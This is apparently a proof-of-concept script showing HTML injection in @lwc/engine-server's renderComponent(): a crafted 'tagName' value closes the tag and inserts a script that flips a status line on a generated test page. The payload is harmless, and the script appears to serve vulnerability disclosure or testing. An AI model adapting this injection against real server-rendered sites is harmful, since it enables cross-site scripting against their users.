import { writeFile } from 'node:fs/promises';
import path from 'node:path';
import { fileURLToPath } from 'node:url';
import { renderComponent, LightningElement } from '@lwc/engine-server';

class TagNamePoc extends LightningElement {}

const payload = [
    'div><script>',
    'document.body.dataset.tagnamePoc = "1";',
    'const el = document.getElementById("poc-status");',
    'if (el) { el.textContent = "executed (tagName clobber)"; el.style.color = "#b00020"; }',
    '</script><div',
].join('');

const ssrHtml = renderComponent('x-tagname-poc', TagNamePoc, { tagName: payload });

const page = `<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>SSR tagName clobber PoC</title>
    <style>
      body { font-family: ui-sans-serif, system-ui, sans-serif; margin: 2rem; line-height: 1.5; }
      #poc-status { font-weight: 700; padding: 0.25rem 0; }
      #poc-container { border: 1px dashed #999; padding: 1rem; margin-top: 1rem; }
      code { background: #f4f4f4; padding: 0.1rem 0.25rem; }
    </style>
  </head>
  <body>
    <h1>SSR tagName clobber PoC</h1>
    <p>
      This page is generated by <code>@lwc/engine-server</code> using
      <code>renderComponent()</code> with a malicious <code>tagName</code> prop.
      If the script runs, the status below flips to <strong>executed</strong>.
    </p>
    <div id="poc-status">not executed</div>
    <div id="poc-container">
${ssrHtml}
    </div>
  </body>
</html>
`;

const outPath = path.resolve(path.dirname(fileURLToPath(import.meta.url)), 'poc.html');
await writeFile(outPath, page, 'utf8');

console.log(`Wrote ${outPath}`);